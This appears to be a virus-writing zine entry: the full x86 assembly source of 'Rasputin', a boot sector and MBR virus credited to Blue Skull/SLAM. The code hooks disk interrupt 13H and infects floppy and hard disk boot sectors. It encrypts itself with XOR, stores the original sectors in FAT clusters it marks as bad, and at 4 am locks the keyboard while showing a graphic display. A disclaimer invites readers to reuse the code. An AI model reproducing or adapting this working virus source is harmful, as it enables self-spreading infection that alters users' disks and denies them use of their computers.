Copy Link
Add to Bookmark
Report
SLAM4.041: Rasputin by Blue Skull/SLAM
[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]
( )
) (
( ‹‹‹ ‹‹‹ ‹‹‹ ‹‹‹ ‹ ‹ ‹‹‹ ‹ ‹ ‹ )
) € € € € € fl € € € € € ‹ €‹€ (
( €fl‹ €fl€ flfl€ €flfl € € € € €€€ )
) € € € € €‹€ € €‹€ € € € € (
( )
) Coded By (
( )
) Blue Skull/SLAM (
( )
[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]
DISCLAIMER
THIS VIRUS WAS WRITTEN FOR EDUCATIONAL PURPOSES ONLY. I TAKE NO RESPONSABILITY FOR DAMAGES THIS VIRUS COULD CAUSE. I'LL NEVER EVER SPREAD THIS VIRUS PERSONALLY. YOU MAY FREELY RIPE OFF THE CODE AS LONG AS YOU DON'T WANT TO USE IT IN DESTRUCTIVE VIRII.
So here we go. This is my first BS/MBR/TSR/Encrypted/Stealth/Payload Virus. Rasputin is a non-destructive virus, as I dislike destructive ones, that has an awesome payload. I love the payload. It's triggered between 4 and 5 am; it also locks the keyboard.
As I already meant I dislike destructive virii and that's the reason I wrote some neat routines that search for empty FAT entries on FDs and marks them as bad. The routines are 100% from me and I am proud of them.
Rasputin_Boot_&_MBR Segment
Assume DS:Rasputin_Boot_&_MBR,ES:Rasputin_Boot_&_MBR,CS:Rasputin_Boot_&_MBR
Org 0H
First_Buffer_Begin Equ This Byte
Entry_Point Proc
Jmp Install
Entry_Point Endp
First_Buffer_End Equ This Byte
Get_Back Proc
Retf
Get_Back Endp
New_Int_13H Proc
Cmp AH,02H
jne Use_The_Old_Int_13H
Cmp CX,0001H
Jne Use_The_Old_Int_13H
Cmp DH,00H
Jne Use_The_Old_Int_13h
Call The_Old_13H
Jc An_Error_Occured
Push AX
Push BX
Push CX
Push DX
PUsH SI
Push DI
Push DS
Push ES
Pushf
Call Interrupt_De_Encrypt
Call Check_And_Infect
Call Interrupt_De_Encrypt
Sorry_An_Error_Occured:
Popf
Pop ES
Pop DS
Pop DI
Pop SI
Pop DX
Pop CX
Pop BX
Pop AX
An_Error_Occured:
Retf 2
Use_The_Old_Int_13H: DB 0EAH
Old_Int_13H Equ This DWord
DD 00000080H
New_Int_13H Endp
The_Old_13H Proc
Pushf
Call CS:Old_Int_13H
Ret
The_Old_13H Endp
Interrupt_De_Encrypt Proc
Push CS
Pop DS
Mov CX,The_End-Install
Mov SI,Offset Install
Interrupt_De_Encrypt EndP
Second_Buffer_Begin Equ This Byte
Encrypt_Decrypt Proc
Virus_Mask Equ This Byte
Mov AL,55
Not_Over:
Xor [SI],AL
Inc SI
Loop Not_Over
Ret
Encrypt_Decrypt Endp
Install Proc
Cli
Xor AX,AX
Mov SS,AX
Mov SP,7BFCH
Sti
Mov DS,AX
Mov SI,Offset En_Decrypted_Begin+Boot_Up_Difference
Mov CX,Second_Buffer_End-En_Decrypted_Begin
Call Encrypt_Decrypt
En_Decrypted_Begin:
DB 0A1H,13H,04H ;Mov AX,[413H]
Sub AL,02H
DB 0A3H,13H,04H ;Mov [413H],AX
Mov CL,6
Shl AX,CL
Mov ES,AX
Cld
Mov SI,Offset Addresses+Boot_Up_Difference
Mov BP,0000H
Mov CX,Number_Of_Sectors
Read_One_More_Sector:
Push CX
Lodsw
Mov CX,AX
Lodsw
Mov DX,AX
Mov BX,BP
Mov AX,0201H
Int 13H
Push SI
Mov SI,BP
Mov CX,200H
Push DS
Push ES
Pop DS
Call Encrypt_Decrypt
Pop DS
Pop SI
Pop CX
Add BP,0200H
Loop Read_One_More_Sector
Push ES
Mov AX,Offset Restore_The_Sector
Push AX
Retf
Install Endp
Signature DB 'RASPUTIN'
Addresses DW 3*2 Dup(0)
Second_Buffer_End Equ This Byte
Restore_The_Sector Proc
Mov SI,004CH
Mov DI,Offset Old_Int_13H
Movsw
Movsw
Mov AX,Offset New_Int_13H
Mov Word PTR [SI-4],AX
Mov AX,ES
Mov Word PTR [SI-2],AX
Mov SI,Offset First_Buffer_Begin+Boot_Up_Difference
Mov DI,Offset First_Buffer_Begin
Mov CX,First_Buffer_End-First_Buffer_Begin
Call Exchange_Bytes
Mov SI,Offset Second_Buffer_Begin+Boot_Up_Difference
Mov DI,Offset Second_Buffer_Begin
Mov CX,Second_Buffer_End-Second_Buffer_Begin
Call Exchange_Bytes
Mov AH,002H
Int 1AH
Cmp CH,04H
Je Its_Show_Time
Xor AX,AX
Push AX
Mov AX,7C00H
Push AX
Mov AX,Offset Get_Back
Push AX
Jmp Interrupt_De_Encrypt
Its_Show_Time:
Mov AL,0ADH
Out 64H,AL
Call Show_Time
Restore_The_Sector Endp
Exchange_Bytes Proc
One_More_Byte:
Mov AL,ES:[DI]
Xchg AL,[SI]
Stosb
Inc SI
Dec CX
Jnz One_More_Byte
Ret
Exchange_Bytes Endp
New_Mask Proc
Push DS
Xor AX,AX
Mov DS,AX
DB 0A0H,1CH,04H
Mov CS:[Virus_Mask+1],AL
Pop DS
Ret
New_Mask Endp
Exchange_Da_Bytes Proc
Mov SI,Offset First_Buffer_Begin
Mov DI,BX
Mov CX,0003h
Call Exchange_Bytes
Mov SI,Offset Second_Buffer_Begin
Lea DI,[BX+Second_Buffer_Begin]
Mov CX,Second_Buffer_End-Second_Buffer_Begin
Call Exchange_Bytes
Ret
Exchange_Da_Bytes Endp
Mask_Of_Check_And_Infect Proc
Mov SI,Offset En_Decrypted_Begin
Mov CX,Second_Buffer_End-En_Decrypted_Begin
Call Encrypt_Decrypt
Ret
Mask_Of_Check_And_Infect Endp
Check_And_Infect Proc
Cld
Push ES
Pop DS
Push CS
Pop ES
Mov SI,BX
Mov DI,0600H
Mov CX,0200H
Repz
Movsb
Push DS
Push CS
Pop DS
Mov AL,[0600H+Virus_Mask+1]
Mov [Virus_Mask+1],AL
Mov SI,0600H+Offset En_Decrypted_Begin
Mov CX,Second_Buffer_End-Second_Buffer_Begin
Call Encrypt_Decrypt
Mov SI,Offset Signature
Mov DI,0600H+Offset Signature
Mov CX,0008H
Repz
Cmpsb
Pop ES
Jne Infect
Push BX
Push ES
Push CS
Pop ES
Mov AX,0201H
Mov BX,0600H
Mov CX,Word Ptr [0600H+Offset Addresses+0000H]
Mov DX,Word Ptr [0600H+Offset Addresses+0002H]
Call The_Old_13H
Mov SI,BX
Mov CX,0200H
Call Encrypt_Decrypt
Mov SI,BX
Pop ES
Pop BX
Mov DI,BX
Mov CX,0003H
Repz
Movsb
Mov SI,0600H+Offset Second_Buffer_Begin
Lea DI,[BX+Second_Buffer_Begin]
Mov CX,Second_Buffer_End-Second_Buffer_Begin
Repz
Movsb
Ret
Infect:
Call Find_Four_Sectors
Jc Exit_Check_And_Infect
Xor BP,BP
Call New_Mask
Call Mask_Of_Check_And_Infect
Call Exchange_Da_Bytes
Mov AX,0301H
Mov CX,0001H
Call The_Old_13H
Push ES
Push DS
Pop ES
Call Copy_Zone
Pop ES
Call Exchange_Da_Bytes
Call Mask_Of_Check_And_Infect
Push DS
Pop ES
Mov BX,0600H
Mov SI,Offset Addresses
Mov CX,Number_Of_Sectors
Push CX
Push SI
Jmp No_Copy
Write_One_More_Sector:
Push CX
Push SI
Call Copy_Zone
No_Copy:
Mov SI,0600H
Mov CX,200H
Call Encrypt_Decrypt
Pop SI
Lodsw
Mov CX,AX
Lodsw
Mov DX,AX
Mov AX,0301H
Call The_Old_13H
Pop CX
Add BP,0200H
Loop Write_One_More_Sector
Exit_Check_And_Infect:
Ret
Check_And_Infect Endp
Copy_Zone Proc
Mov SI,BP
Mov DI,0600H
Mov CX,200H
Repz
Movsb
Ret
Copy_Zone Endp
Find_Four_Sectors Proc
Clc
Test DL,80H
Jz No_HD
Mov AL,ES:[BX+01C6H]
Cmp AL,05H
Jb Set_Error
Push ES
Push DS
Pop ES
Mov DI,Offset Addresses
Mov CX,Number_Of_Sectors
Mov AH,00H
One_More_HD_Address:
Stosw
Xchg AX,DX
Stosw
Xchg AX,DX
Dec AL
Loop One_More_HD_Address
Pop ES
Ret
Set_Error:
Stc
Ret
No_HD:
Mov AL,ES:[BX+15H] ;Check for known FD
Cmp AL,0F9H
Je Known_FD
Cmp AL,0FDH
Je Known_FD
Cmp AL,0F0H
Jne Set_Error
Mov AX,ES:[BX+18H] ;Gets the number of
Cmp AX,18 ;of Sectors per Cylinder !!!
Ja Set_Error
Known_FD:
Mov AX,ES:[BX+11H] ;Calculats the first data
Mov CL,4 ;sector getting first the
Shr AX,CL ;number of Entries in the
Mov BP,AX ;first Directory !!!
Mov AX,ES:[BX+16H] ;Now gets the number
Mov Byte PTR [Offset Second_FAT_Sector+2],AL
Push AX ;of Sectors per FAT
Shl AX,1 ;and doubles the value
Inc AX ;because there are 2
Add AX,BP ;FAT's per DISK !!!
Mov [First_Data_Sector+2],AX
Pop AX
Dec AX
Mov CH,AL
Mov SI,0002H
Xor DI,DI
Mov BP,0FFFFH
Mov AL,ES:[BX+0DH] ;Gets and stores the number
Dec AL ;of Sectors Per Cluster !!!
Jz One_Sector_Per_Cluster
Mov AX,0E5D1H
Jmp Got_2_Sectors_Per_Cluster
One_Sector_Per_Cluster:
Mov AX,9090H
Got_2_Sectors_Per_Cluster:
Push BX
Mov [One_Or_Two_Sectors],AX
Mov BX,ES:[BX+18H] ;Now gets the number
Push ES ;of Sectors per Cylinder !!!
Push DS
Pop ES
Mov CL,01H
One_More_Fat_Sector:
Inc CL
Push CX
Push BX
Mov AX,0201H
Mov BX,0600H
Mov CH,00H
Call The_Old_13H ;Reads the first
Pop BX ;FAT-Sectors !!!
Pop CX
One_More_Fat_Entry:
Inc BP
Inc SI
Cmp SI,01FFH
Je Edge_Value
Cmp SI,0200H
Je No_Edge_Value
Mov AX,[0600H+SI]
Next_Fat_Entry:
Test BP,0001H
Jz Last_12_Bits
Inc SI
Test AX,0FFF0H
Jnz One_More_Fat_Entry
Or AX,0FF70H
Mov [0600H-1+SI],AX
Jmp Found_A_Free_Sector
Last_12_Bits:
Test AX,0FFFH
Jnz One_More_Fat_Entry
Or AX,0FF7H
Mov [0600H+SI],AX
Jmp Found_A_Free_Sector
Edge_Value:
Test BP,0001H
Jnz No_Edge_Value
Mov SI,0FFFFH
Jmp Check_If_Fat_Over
No_Edge_Value:
Xor SI,SI
Check_If_Fat_Over:
Dec CH
Jnz One_More_Fat_Sector
Pop ES
Pop BX
Jmp Set_Error
Found_A_Free_Sector:
Push CX
Push DX
Push BX
Mov AX,0301H
Mov BX,0600H
Mov CH,00H
Call The_Old_13H ;Writes the first 3
Mov AH,03H ;FAT-Sectors !!!
Second_FAT_Sector Equ This Byte
Add CL,00H
Call The_Old_13H
Pop BX
Call Address
Mov AX,CX
Mov Word PTR [Offset Addresses+DI],AX
Inc DI
Inc DI
Mov AX,DX
Mov Word Ptr [Offset Addresses+DI],AX
Inc DI
Inc DI
Pop DX
Pop CX
Cmp DI,Number_Of_Sectors*4
Jne One_More_Fat_Entry
FD_Exit:
Pop ES
Pop BX
Ret
Find_Four_Sectors Endp
Address Proc
Push BX
Push DX
Push BP
Push SI
One_Or_Two_Sectors Equ This Word
Shl BP,1
First_Data_Sector Equ This Word
Add BP,9999H
Mov SI,BX
Mov AX,BP
Xor DX,DX
Mov BX,SI
Shl BX,1
Div BX
Mov CH,AL
Mov AX,BP
Xor DX,DX
Mov BX,SI
Div BX
Inc DL
Mov CL,DL
And AL,01H
Pop SI
Pop BP
Pop DX
Pop BX
Mov DH,AL
Ret
Address Endp
Show_Time Proc
Push CS
Pop DS
Mov AX,Background_Segment
Mov ES,AX
Mov AX,0013H
Int 10H
Mov CX,10H
Xor BX,BX
One_More_RGB:
Mov BL,CL
Xor AX,AX
Mov AH,CL
Add AH,10H
Shl AH,1
Mov SI,AX
Call Set_Color
Loop One_More_RGB
Mov CX,003FH
Mov BH,3FH
Mov SI,3F3FH
One_More_Text_Color:
Mov BL,0DH
Add BL,CL
Call Set_Color
Loop One_More_Text_Color
Call Generator
Call Anti_Aliance
Mov SI,Offset Rasputin_Message
Mov DI,42*320+(320-(Rasputin_Message_Length*3*8+Rasputin_Message_Length*3))/2
Mov CX,Rasputin_Message_Length
Call Write_Text
Mov SI,Offset Coded_By_Message
Mov DI,88*320+(320-(Coded_By_Message_Length*3*8+Coded_By_Message_Length*3))/2
Mov CX,Coded_By_Message_Length
Call Write_Text
Mov SI,Offset Blue_Skull_Message
Mov DI,134*320+(320-((Blue_Skull_Message_Length)*3*8-12+Blue_Skull_Message_Length*3))/2
Mov CX,Blue_Skull_Message_Length
Call Write_Text
Call Anti_Aliance
Mov AX,0A000H
Mov ES,AX
One_More_Frame:
Call Wait_For_Retrace
Call Do_Wave
Add Delta_X,04H
Add Delta_Y,05H
Jmp One_More_Frame
Ret
Show_Time Endp
Write_Text Proc
Push CX
Mov BH,03H
Mov AX,1130H
Int 10H
Pop CX
One_More_Char:
Push CX
Mov AH,00H
Lodsb
Shl AX,1
Shl AX,1
Shl AX,1
Offset_Chars Equ This Word
Push BP
Add BP,AX
Mov CX,8
One_More_Pixel_Byte:
Mov AL,ES:[BP]
Push CX
Mov CX,8
One_More_Pixel:
Shl AX,1
And AH,01H
Jz New_Pixel
Push AX
Push ES
Mov AX,Background_Segment
Mov ES,AX
Mov AL,Char_Color
Push DI
Push CX
Square_Size Equ This Word
Mov CX,Squares_Size
One_More_Pixel_Line:
Push CX
Mov CX,Squares_Size
Repz
Stosb
Pop CX
Add DI,320
Sub DI,Squares_Size
Loop One_More_Pixel_Line
Pop CX
Pop DI
Pop ES
Pop AX
New_Pixel:
Add DI,Squares_Size
Loop One_More_Pixel
Pop CX
Add DI,Squares_Size*320-Squares_Size*8
Inc BP
Loop One_More_Pixel_Byte
Sub DI,Squares_Size*8*320-Squares_Size*8-2
Pop BP
Pop CX
Loop One_More_Char
Ret
Write_Text Endp
Generator Proc
Mov DI,0140H
Mov CX,198*320
One_More_Random_Byte:
Push CX
Push DI
Xor DX,DX
Mov CX,5263H
Mov AX,Line_X
Mov BX,Line_Y
Div CX
Rcl AH,1
Adc AL,AH
Ror BH,1
Ror BH,1
Add BL,BH
Xor AH,BL
Xor AL,BH
Add BX,DX
Mov Line_X,AX
Mov Line_Y,BX
And AL,0FH
Pop DI
Pop CX
Stosb
Loop One_More_Random_Byte
Ret
Generator Endp
Anti_Aliance Proc
Mov AX,Background_Segment
Mov ES,AX
Mov DI,320
Mov CX,199*320
Anti_Aliance_Pixel:
Mov AL,Byte Ptr ES:[DI-1]
Add AL,Byte Ptr ES:[DI+1]
Add AL,Byte Ptr ES:[DI-320]
Add AL,Byte Ptr ES:[DI+320]
Shr AL,1
Shr AL,1
Stosb
Loop Anti_Aliance_Pixel
Ret
Anti_Aliance Endp
;BL=Index, BH=Red, LO(SI)=Green, HI(SI)=Blue
Set_Color Proc
Mov DX,03C8H
Mov AL,BL
Out DX,AL
Inc DX
Mov AL,BH
Out DX,AL
Mov AX,SI
Out DX,AL
Mov AL,AH
Out DX,AL
Ret
Set_Color Endp
Do_Wave Proc
Mov DI,Hidden_Lines*320
Mov CX,(200-Hidden_Lines*2)
Mov BL,Delta_Y
One_More_Row_To_Go:
Mov SI,DI
Call Get_Wave
Inc BL
Push BX
Push CX
Mov BX,AX
Mov CL,8
Sal BX,CL
Mov CL,6
Sal AX,CL
Add AX,BX
Add SI,AX
Mov CX,320
Mov BL,Delta_X
One_More_Col_To_Go:
Call Get_Wave
Inc BL
Mov DX,AX
Push DS
Mov AX,Background_Segment
Mov DS,AX
Push SI
Add SI,DX
Movsb
Pop SI
Pop DS
Inc SI
Loop One_More_Col_To_Go
Pop CX
Pop BX
Loop One_More_Row_To_Go
Ret
Do_Wave Endp
Get_Wave Proc
Push CX
Mov BH,00H
Push BX
Mov AH,00H
Cmp BX,64
Jnb Second_Quadrant
Mov AL,[BX+Waves]
Jmp Get_Wave_Exit
Second_Quadrant:
Cmp BX,128
Jnb Third_Quadrant
Sub BX,64
Mov AX,63
Sub AX,BX
Xchg AX,BX
Mov AL,[BX+Waves]
Jmp Get_Wave_Exit
Third_Quadrant:
Cmp BX,192
Jnb Fourth_Quadrant
Sub BX,128
Mov AL,[BX+Waves]
Not AX
Jmp Get_Wave_Exit
Fourth_Quadrant:
Sub BX,192
Mov AX,63
Sub AX,BX
Xchg AX,BX
Mov AL,[BX+Waves]
Not AX
Get_Wave_Exit:
Pop BX
Pop CX
Ret
Get_Wave Endp
Wait_For_Retrace Proc
Mov DX,03DAH
Not_Zero:
In AL,DX
Test AL,08H
Jne Not_Zero
Zero:
In AL,DX
Test AL,08H
Je Zero
Ret
Wait_For_Retrace Endp
Delta_X DB 0
Delta_Y DB 64
Line_X DW 7135H
Line_Y DW 4B21H
Background_Segment DW 5000H
Rasputin_Message DB 'RASPUTIN'
Rasputin_Message_Length Equ This Byte - Rasputin_Message
Coded_By_Message DB 'Coded By'
Coded_By_Message_Length Equ This Byte - Coded_By_Message
Blue_Skull_Message DB 'Blue Skull'
Blue_Skull_Message_Length Equ This Byte - Blue_Skull_Message
DB 'SLAM FOREVER !!!'
Waves DB 00H,00H,00H,01H,01H,01H
DB 02H,02H,03H,03H,03H,04H
DB 04H,05H,05H,05H,06H,06H
DB 06H,07H,07H,07H,08H,08H
DB 08H,09H,09H,09H,0AH,0AH
DB 0AH,0BH,0BH,0BH,0BH,0CH
DB 0CH,0CH,0CH,0DH,0DH,0DH
DB 0DH,0DH,0EH,0EH,0EH,0EH
DB 0EH,0EH,0FH,0FH,0FH,0FH
DB 0FH,0FH,0FH,0FH,0FH,0FH
DB 0FH,0FH,0FH,0FH
Factor Equ 32
Hidden_Lines Equ 21
Wave_Factor Equ 1
Char_Color Equ 3FH
Squares_Size Equ 3
To_The_Old_Int_13H Equ Old_Int_13h
The_End Equ This Byte
Boot_Up_Difference Equ 7C00H
Number_Of_Sectors Equ 3
Main_Proc Proc
Call Install_Virus
Mov AX,0201H
Mov BX,Offset Install_Buffer
Mov CX,0001H
Mov DX,0000H
Int 13H
Call Deinstall_Virus
Mov AX,4C00H
Int 21H
Main_Proc Endp
Install_Virus Proc
Xor AX,AX
Mov DS,AX
Mov DI,004EH
Mov AX,[DI]
Mov DS,AX
Xor SI,SI
Mov DI,0100H
Mov CX,8
Repz
Cmpsb
Je No_Memory
Xor AX,AX
Mov DS,AX
DB 0A1H,13H,04H ;Mov AX,[413H]
Mov AX,0280H
Sub AL,02H
DB 0A3H,13H,04H ;Mov [413H],AX
Mov CL,6
Shl AX,CL
No_Memory:
Mov ES,AX
Xor SI,SI
Xor DI,DI
Mov AX,CS
Mov DS,AX
Mov CX,Offset The_End
Cld
Repz
Movsb
Cli
Xor AX,AX
Mov DS,AX
Mov SI,004CH
Mov DI,Offset Old_Int_13H
Movsw
Movsw
Mov AX,Offset New_Int_13H
Mov Word PTR [SI-4],AX
Mov AX,ES
Mov Word PTR [SI-2],AX
Sti
Push ES
Pop DS
Mov CX,The_End-Install
Mov SI,Offset Install
Call Encrypt_Decrypt
Push CS
Pop DS
Push CS
Pop ES
Ret
Install_Virus Endp
Deinstall_Virus Proc
Xor AX,AX
Mov DS,AX
Mov ES,AX
Mov SI,0413H
Mov AX,0280H
Mov [SI],AX
Mov SI,004EH
Mov AX,[SI]
Mov DS,AX
Mov SI,Offset Old_Int_13H
Mov DI,004CH
Movsw
Movsw
Ret
Deinstall_Virus Endp
Install_Buffer DB 512 Dup (0)
Rasputin_Boot_&_MBR Ends
End Main_Proc
